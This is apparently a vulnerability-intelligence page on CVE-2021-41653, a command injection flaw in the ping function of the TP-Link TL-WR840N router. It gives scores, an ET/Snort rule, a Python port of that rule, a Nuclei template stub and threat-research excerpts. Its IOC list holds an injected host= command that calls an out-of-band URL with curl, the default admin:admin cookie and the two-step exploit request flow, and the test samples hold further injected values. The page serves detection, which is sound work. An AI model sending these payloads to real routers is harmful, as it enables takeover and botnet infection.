CVE-2021-41653
Published: 2021-11-13
Priority: P1 (90) · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 77.47% (99.5th percentile)
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tp-link | tl-wr840n_firmware | <= tl-wr840n(eu)_v5_171211 | — |
Detection & IOCs (extracted from sources)
- cookie: Authorization=Basic YWRtaW46YWRtaW4=
- path: /cgi?2
- path: /cgi?7
- command: host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
- snort rule (sid:2034677):

```
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)"; flow:established,to_server; http.request_line; content:"POST /cgi?2"; startswith; fast_pattern; http.request_body; content:"|5b|IPPING|5f|DIAG|23|"; nocase; content:"host="; distance:0; nocase; pcre:"/^(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; reference:url,k4m1ll0.com/cve-2021-41653.html; reference:url,www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; reference:cve,2021-41653; classtype:attempted-admin; sid:2034677; rev:2; metadata:attack_target Networking_Equipment, created_at 2021_12_11, cve CVE_2021_41653, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_11;)
```
- Exploit targets the POST /cgi?2 endpoint with an [IPPING_DIAG#...] body block containing a command-injected 'host=' parameter; a second follow-up request is sent to POST /cgi?7 to trigger execution.
- The Snort/ET rule (sid:2034677) detects the exploit by matching 'POST /cgi?2' in the request line combined with '[IPPING_DIAG#' and 'host=' in the body, followed by shell metacharacters (backtick, semicolon, pipe, etc.) via PCRE.
- Exploitation requires authentication; attackers use default credentials (admin:admin, Base64: YWRtaW46YWRtaW4=) in the Authorization cookie. Monitor for login attempts with default credentials followed by a POST to /cgi?2.
- The malicious dropper script is named 'tshit.sh'; its download and execution on a TP-Link router is a strong indicator of compromise. The script also blocks connections to commonly targeted ports to prevent competing botnets.
- MANGA/Dark Mirai payload binaries use the naming pattern 'eh.<arch>' (e.g., eh.arm5, eh.mips, eh.x86) and 'Dark.<arch>' / 'dark.<arch>'. Presence of these filenames on a Linux/IoT device indicates infection.
- FortiGuard IPS signatures 'TP-Link.HTTP.Management.Code.Execution' and 'TP-Link.Home.Wifi.Router.CGI.Referer.Command.Injection' can generically detect this attack class.
- Check Point IPS signature 'TP-Link TL-WR840N Router Command Injection (CVE-2021-41653)' provides network-level detection.
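To check how the ET rule above behaves against sample traffic, here is an added Python port of its matching logic (request line, body marker, relative 'host=' match, then the rule's PCRE); this is example code written for this page, not the rule engine or anything from the rule's authors, and the sample request bodies are constructed stand-ins, not the router's real form encoding.

```python
import re

# Constants lifted from ET rule sid:2034677 as shown on this page.
REQUEST_LINE_PREFIX = b"POST /cgi?2"   # content:"POST /cgi?2"; startswith
BODY_MARKER = b"[IPPING_DIAG#"         # content:"|5b|IPPING|5f|DIAG|23|"; nocase
HOST_PARAM = b"host="                  # content:"host="; distance:0; nocase
# The rule's pcre; /R makes ^ anchor right after the "host=" match. It matches
# ` ; | (raw or %-encoded), %26, or < > $ (raw or %-encoded) followed by ( or %28.
SHELL_META = re.compile(
    rb"^(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))"
)


def matches_rule(request_line: bytes, body: bytes) -> bool:
    """Return True if this request would trigger sid:2034677."""
    if not request_line.startswith(REQUEST_LINE_PREFIX):
        return False
    lowered = body.lower()                      # both content matches are nocase
    marker_at = lowered.find(BODY_MARKER.lower())
    if marker_at < 0:
        return False
    # distance:0 -> "host=" must start at or after the end of the marker match
    host_at = lowered.find(HOST_PARAM, marker_at + len(BODY_MARKER))
    if host_at < 0:
        return False
    after_host = body[host_at + len(HOST_PARAM):]  # original bytes: the pcre has no /i
    return SHELL_META.match(after_host) is not None


def scan(requests):
    """Run the check over (label, request_line, body) tuples; return labels that alert."""
    return [label for label, line, body in requests if matches_rule(line, body)]


# Constructed samples (hypothetical body layout; only the rule-relevant tokens matter).
SAMPLES = [
    ("benign-ping", b"POST /cgi?2 HTTP/1.1", b"[IPPING_DIAG#CONSTRUCTED]\r\nhost=8.8.8.8\r\n"),
    ("subshell", b"POST /cgi?2 HTTP/1.1", b"[IPPING_DIAG#CONSTRUCTED]\r\nhost=$(echo 127.0.0.1)\r\n"),
    ("encoded-semicolon", b"POST /cgi?2 HTTP/1.1", b"[ipping_diag#CONSTRUCTED]\r\nHOST=%3becho\r\n"),
    ("followup-cgi7", b"POST /cgi?7 HTTP/1.1", b"[IPPING_DIAG#CONSTRUCTED]\r\nhost=$(echo 1)\r\n"),
    ("other-endpoint", b"GET /cgi?1 HTTP/1.1", b""),
]

if __name__ == "__main__":
    for label in scan(SAMPLES):
        print("ALERT sid:2034677", label)
```

Note that the follow-up POST to /cgi?7 never alerts on its own: the rule keys on the injection request, so the trigger request only shows up through the preceding /cgi?2 match.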
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-8fx7-hx38-cm88 · ghsa_unreviewed · 2022-05-24 · CWE-94 · CRITICAL
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
VulnCheck
TP-Link tl-wr840n_firmware Improper Control of Generation of Code ('Code Injection')
vulncheck · 2021 · CVSS 9.8 · CRITICAL
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
Affected: TP-Link tl-wr840n_firmware
Required Action: Apply remediations or mitigations per vendor instructions, or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-41653; https://dashboard.shadowserver.org/stat
Suricata
ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)
suricata · 2021-12-11 · CVSS 9.8 · CRITICAL
Rule: sid:2034677, rev:2; the full rule text is reproduced in the Detection & IOCs section above.
Nuclei
TP-Link - OS Command Injection
nuclei · CVSS 9.8 · CRITICAL
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
Template:

```yaml
id: CVE-2021-41653
info:
  name: TP-Link - OS Command Injection
  author: gy741
  severity: critical
  description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
  reference
```
Checkpoint
13th December – Threat Intelligence Report
blogs_checkpoint · 2021-12-13 · CVE-2021-44228
## 13th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th December, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Check Point Research warns of potential ransomware attacks as samples of Emotet are fast-spreading via Trickbot. Since the Emotet takedown 10 months ago, CPR has spotted over 140,000 victims of Trickbot, across 149 countries, which might now be converted into Emotet, providing ransomware gangs a backdoor into compromise
Fortinet
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
blogs_fortinet · 2021-12-08
FORTIGUARD LABS THREAT RESEARCH
By Joie Salvio | December 08, 2021
Last week, our FortiGuard Labs team encountered a malware sample that's currently being distributed in the wild targeting TP-Link wireless routers. It leverages a post-authentication RCE vulnerability released barely two weeks prior.
As it turns out, it is an updated variant of the MANGA campaign (also known as Dark) that distributes samples based on Mirai's published source code. This Mirai-based Distributed Denial of Service (DDoS) botnet campaign is one that FortiGuard Labs has been actively monitoring. The campaign originally piqued our interest due to the continuous updating of its list of target vulnerabilities—more so than ot
Greynoiseio
Malicious Tag Roundup (January 2022)
blogs_greynoiseio